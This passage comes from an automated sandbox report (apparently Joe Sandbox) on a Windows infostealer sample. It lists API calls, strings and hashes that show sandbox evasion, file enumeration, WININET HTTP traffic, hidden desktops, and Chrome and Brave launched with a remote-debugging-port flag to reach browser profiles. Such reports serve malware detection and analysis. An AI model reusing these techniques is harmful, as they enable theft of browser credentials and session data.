                                              • Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,009D1ED0), ref: 00406353
                                              • Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                              • Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,009D1218,00000000,00000000,00400100,00000000), ref: 004063D5
                                              • Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                              • Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415478
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                             Joe Sandbox IDA Plugin
                                             • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                             Similarity
                                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                            • String ID: ERROR$ERROR
                                            • API String ID: 3287882509-2579291623
                                            • Opcode ID: 243c3ba6e4d083e298a404233cb39cc9641087610bb8f65c24bf72cb52f6143f
                                            • Instruction ID: 220a7b172e2a8d17d187597bbcd3bb12c7c2fc56be07e285a6b23909b802432f
                                            • Opcode Fuzzy Hash: 243c3ba6e4d083e298a404233cb39cc9641087610bb8f65c24bf72cb52f6143f
                                            • Instruction Fuzzy Hash: 6E118630A01048ABCB14FF65EC52EED33399F50354F40456EF90A5B4A2EF38AB95C65E
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                            • GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                             Joe Sandbox IDA Plugin
                                             • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                             Similarity
                                            • API ID: Heap$AllocComputerNameProcess
                                            • String ID:
                                            • API String ID: 4203777966-0
                                            • Opcode ID: bd395e3c10b2e9752f846d4f55ec5ddb2c88ed80ced139acaed9e3128f7bbde2
                                            • Instruction ID: 80df14e24d55d9e77394b8c0389cbc6422d62e125eda11eaf6ba37d1415b345b
                                            • Opcode Fuzzy Hash: bd395e3c10b2e9752f846d4f55ec5ddb2c88ed80ced139acaed9e3128f7bbde2
                                            • Instruction Fuzzy Hash: D60181B1E08359ABC700CF98DD45BAFBBB8FB04751F10021BF505E2280E7B85A408BA2
                                            APIs
                                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416CBC), ref: 0040112B
                                            • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416CBC), ref: 00401132
                                            • ExitProcess.KERNEL32 ref: 00401143
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                             Joe Sandbox IDA Plugin
                                             • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                             Similarity
                                            • API ID: Process$AllocCurrentExitNumaVirtual
                                            • String ID:
                                            • API String ID: 1103761159-0
                                            • Opcode ID: 11ea4e03c837496306c88658afd9ed440fb44e3d5b70bdcdd02673fa8ef340ef
                                            • Instruction ID: f86d798d442288df0e099431c712f1cdbed5da6d4770a056b1c254158006f616
                                            • Opcode Fuzzy Hash: 11ea4e03c837496306c88658afd9ed440fb44e3d5b70bdcdd02673fa8ef340ef
                                            • Instruction Fuzzy Hash: DCE0E670D8A30CFBE7105BA19D0AB4D77689B04B15F101156F709BA5D0D6B92640565D
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008407CE
                                            • Module32First.KERNEL32(00000000,00000224), ref: 008407EE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929328076.0000000000840000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_840000_XJQkTVvJ3I.jbxd
                                             Similarity
                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                            • String ID:
                                            • API String ID: 3833638111-0
                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                            • Instruction ID: 31dd417f0b46843a24ac24f44a75c6a7240eb4ebe4faebe9566caac4c9cb6200
                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                            • Instruction Fuzzy Hash: 2CF06D326017196BE7203AB9A88DA6F76E8FF89765F100528E742D10C0DAB5F8458E62
                                            APIs
                                            • SetErrorMode.KERNEL32(00000400,?,?,02450223,?,?), ref: 02450E19
                                            • SetErrorMode.KERNEL32(00000000,?,?,02450223,?,?), ref: 02450E1E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                             Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                            • Instruction ID: e1b12fe88f2fad782c68d0e31ab567b73fc92b09f825ff25b4754dc4cb9b2f3f
                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                            • Instruction Fuzzy Hash: 0CD0123514512877D7002A94DC09BCE7B1CDF09B66F108011FB0DD9181C770954046E5
                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416CBC), ref: 004010B3
                                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416CBC), ref: 004010F7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                             Joe Sandbox IDA Plugin
                                             • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                             Similarity
                                            • API ID: Virtual$AllocFree
                                            • String ID:
                                            • API String ID: 2087232378-0
                                            • Opcode ID: 4ccb3339a7f6084aabfd7cf6baf65b53e8baa26228d10618978cb16090ab9117
                                            • Instruction ID: a2dd58c0224e163af538114889642f36ecbeef109afe3d50a53e5cb7169f74e2
                                            • Opcode Fuzzy Hash: 4ccb3339a7f6084aabfd7cf6baf65b53e8baa26228d10618978cb16090ab9117
                                            • Instruction Fuzzy Hash: 74F0E2B1A42208BBE7149AA4AC59FAFB799E705B04F300459F540E3290D571AF00DAA4
                                            APIs
                                              • Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                              • Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                              • Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                              • Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                              • Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                              • Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                            • ExitProcess.KERNEL32 ref: 004011C6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                             Joe Sandbox IDA Plugin
                                             • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                             Similarity
                                            • API ID: Heap$Process$AllocName$ComputerExitUser
                                            • String ID:
                                            • API String ID: 1004333139-0
                                            • Opcode ID: dcd40bd9b7440eb8545f2694ec48fb4b44b4fea9788a6d776e7c72e508f0613a
                                            • Instruction ID: bcf4cddec8ba3652d3daa4bfa83a7295d39fc22ea0064294e7a9f420d8d9705c
                                            • Opcode Fuzzy Hash: dcd40bd9b7440eb8545f2694ec48fb4b44b4fea9788a6d776e7c72e508f0613a
                                            • Instruction Fuzzy Hash: E1E0ECB5D5820152DB1473B6AC06B5B339D5B1934EF04142FF90896252FE29F8404169
                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 008404B6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929328076.0000000000840000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_840000_XJQkTVvJ3I.jbxd
                                             Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                            • Instruction ID: 89afeacf3f88c61f0aa4669cd2c0956d04deb6d01c2eec4ac8043f773b7f33c1
                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                            • Instruction Fuzzy Hash: 64113C79A40208EFDB01DF98C985E99BBF5EF08350F058094FA489B362D375EA90DF81
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2F,00000000,?,?,?,00421450,00420B2E), ref: 0040BEC5
                                            • StrCmpCA.SHLWAPI(?,00421454), ref: 0040BF33
                                            • StrCmpCA.SHLWAPI(?,00421458), ref: 0040BF49
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C8A9
                                            • FindClose.KERNEL32(000000FF), ref: 0040C8BB
                                            Strings
                                            • --remote-debugging-port=9229 --profile-directory=", xrefs: 0040C495
                                            • Preferences, xrefs: 0040C104
                                            • --remote-debugging-port=9229 --profile-directory=", xrefs: 0040C3B2
                                            • --remote-debugging-port=9229 --profile-directory=", xrefs: 0040C534
                                            • \Brave\Preferences, xrefs: 0040C1C1
                                            • Brave, xrefs: 0040C0E8
                                            • Google Chrome, xrefs: 0040C6F8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                             Joe Sandbox IDA Plugin
                                             • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                             Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                            • API String ID: 3334442632-1869280968
                                            • Opcode ID: 7f2c12acea1fb690b98b804b029ed6a0b383e69760eb48825d33dc6626a9561a
                                            • Instruction ID: 94c18d54b217f3a33de79012ae3cbc39d408ee074d55138b38aa149d1ce8c153
                                            • Opcode Fuzzy Hash: 7f2c12acea1fb690b98b804b029ed6a0b383e69760eb48825d33dc6626a9561a
                                            • Instruction Fuzzy Hash: 5C52A871A011049BCB14FB61DC96EEE733DAF54304F4045AEF50A66091EF386B98CFAA
                                            APIs
                                            • wsprintfA.USER32 ref: 00413B1C
                                            • FindFirstFileA.KERNEL32(?,?), ref: 00413B33
                                            • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413B85
                                            • StrCmpCA.SHLWAPI(?,00420F58), ref: 00413B97
                                            • StrCmpCA.SHLWAPI(?,00420F5C), ref: 00413BAD
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00413EB7
                                            • FindClose.KERNEL32(000000FF), ref: 00413ECC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                             Joe Sandbox IDA Plugin
                                             • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                             Similarity
                                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*$q?A
                                            • API String ID: 1125553467-4052298153
                                            • Opcode ID: 5188e768485120e5afde4a9c889630e7fccae7ad22d18829d963d7ba80f2afd1
                                            • Instruction ID: 118bc6de907018410b19fab89ebe74f6f374c1ff32bc5bb8bfd4c4c53b142975
                                            • Opcode Fuzzy Hash: 5188e768485120e5afde4a9c889630e7fccae7ad22d18829d963d7ba80f2afd1
                                            • Instruction Fuzzy Hash: E9A141B1A042189BDB24DF64DC85FEA7379BB48301F44458EF60D96181EB74AB88CF66
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                            • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2F,00000000,?,?,?,00421450,00420B2E), ref: 0245C12C
                                            • StrCmpCA.SHLWAPI(?,00421454), ref: 0245C19A
                                            • StrCmpCA.SHLWAPI(?,00421458), ref: 0245C1B0
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0245CB10
                                            • FindClose.KERNEL32(000000FF), ref: 0245CB22
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                             Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID:
                                            • API String ID: 3334442632-0
                                            • Opcode ID: 7b98e80a942e0a63a7546d3dbe04fcd52efaade0bac1e590d268923d2021d0db
                                            • Instruction ID: d47526ed6a10129815c062a2c0219f9555e38e12d9ff692fe71c4cfb60d38214
                                            • Opcode Fuzzy Hash: 7b98e80a942e0a63a7546d3dbe04fcd52efaade0bac1e590d268923d2021d0db
                                            • Instruction Fuzzy Hash: B8520672900624ABCB14FB61DC99EFE773AAF54305F40459EE54AB6090EF349B48CF52
                                            APIs
                                            • wsprintfA.USER32 ref: 00414B7C
                                            • FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                            • StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                            • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                            • FindClose.KERNEL32(000000FF), ref: 00414DE2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                             Joe Sandbox IDA Plugin
                                             • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                             Similarity
                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID: %s\%s$%s\%s$%s\*$-SA
                                            • API String ID: 180737720-309722913
                                            • Opcode ID: 10fc233258d7d774f39183cfdf7fbc98fbe50a34da23b857008ae2781d984a66
                                            • Instruction ID: 6eceda3e2f2aeeb228f448c6629b31eb3c314648a2220d8d34325ba683034fba
                                            • Opcode Fuzzy Hash: 10fc233258d7d774f39183cfdf7fbc98fbe50a34da23b857008ae2781d984a66
                                            • Instruction Fuzzy Hash: F2617771904218ABCB20EBA0ED45FEA737DBF48701F40458EF60996191FB74AB84CF95
                                            APIs
                                            • wsprintfA.USER32 ref: 02463D83
                                            • FindFirstFileA.KERNEL32(?,?), ref: 02463D9A
                                            • lstrcat.KERNEL32(?,?), ref: 02463DEC
                                            • StrCmpCA.SHLWAPI(?,00420F58), ref: 02463DFE
                                            • StrCmpCA.SHLWAPI(?,00420F5C), ref: 02463E14
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0246411E
                                            • FindClose.KERNEL32(000000FF), ref: 02464133
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                            • String ID:
                                            • API String ID: 1125553467-0
                                            • Opcode ID: 3ab95b3bf23d215e0781e232aecc607664a3e5c33156cac28c621625d69ea7f5
                                            • Instruction ID: e6359be6b2c03e71b3979fcca3f21b4b3761a9fd5c728a97feaad8b07995aefb
                                            • Opcode Fuzzy Hash: 3ab95b3bf23d215e0781e232aecc607664a3e5c33156cac28c621625d69ea7f5
                                            • Instruction Fuzzy Hash: 46A16271A00218ABDB34DFA4DC88FFA7379AF58700F44458EE60D96180EB759B84CF62
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004147D0
                                            • HeapAlloc.KERNEL32(00000000), ref: 004147D7
                                            • wsprintfA.USER32 ref: 004147F6
                                            • FindFirstFileA.KERNEL32(?,?), ref: 0041480D
                                            • StrCmpCA.SHLWAPI(?,00420FAC), ref: 0041483B
                                            • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00414851
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 004148DB
                                            • FindClose.KERNEL32(000000FF), ref: 004148F0
                                            • lstrcatA.KERNEL32(?,009D1EC0,?,00000104), ref: 00414915
                                            • lstrcatA.KERNEL32(?,009D0F88), ref: 00414928
                                            • lstrlenA.KERNEL32(?), ref: 00414935
                                            • lstrlenA.KERNEL32(?), ref: 00414946
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                            • String ID: %s\%s$%s\*
                                            • API String ID: 13328894-2848263008
                                            • Opcode ID: 69dcb7b57205299e4e353f4ff5e3bd6fee26fba3a9fd294cee8ca8b6e7cecfcb
                                            • Instruction ID: 4add3c5e25650dce6a2d7e09fe25a02d5f48076a238705849ce39c3d90be09a7
                                            • Opcode Fuzzy Hash: 69dcb7b57205299e4e353f4ff5e3bd6fee26fba3a9fd294cee8ca8b6e7cecfcb
                                            • Instruction Fuzzy Hash: 145187B1944218ABCB20EB70DC89FEE737DAB58300F40459EB64996190EB74EBC4CF95
                                            APIs
                                            • wsprintfA.USER32 ref: 02464DE3
                                            • FindFirstFileA.KERNEL32(?,?), ref: 02464DFA
                                            • StrCmpCA.SHLWAPI(?,00420FC4), ref: 02464E28
                                            • StrCmpCA.SHLWAPI(?,00420FC8), ref: 02464E3E
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 02465034
                                            • FindClose.KERNEL32(000000FF), ref: 02465049
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID:
                                            • API String ID: 180737720-0
                                            • Opcode ID: fcb2fc1512f1b2bfff4d459872b36b8889449b0cd5417e01b30465ecde3626f1
                                            • Instruction ID: 1f884cfae3eddee3d28d981b3bc4e58ce56ffb96e297e93c37078dd8df76bd4e
                                            • Opcode Fuzzy Hash: fcb2fc1512f1b2bfff4d459872b36b8889449b0cd5417e01b30465ecde3626f1
                                            • Instruction Fuzzy Hash: C3615771900228ABCB24EBA4DD48FEA737DAF48701F44468EF64D96180EB759784CF91
                                            APIs
                                            • memset.MSVCRT ref: 00409E47
                                              • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,009CBD38,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                            • wsprintfA.USER32 ref: 00409E7F
                                            • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00409EA3
                                            • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00409ECC
                                            • memset.MSVCRT ref: 00409EED
                                            • lstrcatA.KERNEL32(00000000,?), ref: 00409F03
                                            • lstrcatA.KERNEL32(00000000,?), ref: 00409F17
                                            • lstrcatA.KERNEL32(00000000,004212D8), ref: 00409F29
                                            • memset.MSVCRT ref: 00409F3D
                                            • lstrcpy.KERNEL32(?,00000000), ref: 00409F7C
                                            • memset.MSVCRT ref: 00409F9C
                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 0040A004
                                            • Sleep.KERNEL32(00001388), ref: 0040A013
                                            • CloseDesktop.USER32(00000000), ref: 0040A060
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memset$Desktoplstrcat$Create$CloseOpenProcessSleepSystemTimelstrcpywsprintf
                                            • String ID: D
                                            • API String ID: 1347862506-2746444292
                                            • Opcode ID: a10202c694136cf4b08f8315fe38596f638a8bb39b3ba1580b4dfb3a89c0cba5
                                            • Instruction ID: 9351db1e319cd03a78e50f41365f33c4a7b54471eb3ec1f6bde0cae738676000
                                            • Opcode Fuzzy Hash: a10202c694136cf4b08f8315fe38596f638a8bb39b3ba1580b4dfb3a89c0cba5
                                            • Instruction Fuzzy Hash: B551B3B1D04318ABDB20DF60DC4AFDA7778AB48704F004599F60DAA2D1EB75AB84CF55
                                            APIs
                                            • wsprintfA.USER32 ref: 00414113
                                            • FindFirstFileA.KERNEL32(?,?), ref: 0041412A
                                            • StrCmpCA.SHLWAPI(?,00420F94), ref: 00414158
                                            • StrCmpCA.SHLWAPI(?,00420F98), ref: 0041416E
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 004142BC
                                            • FindClose.KERNEL32(000000FF), ref: 004142D1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
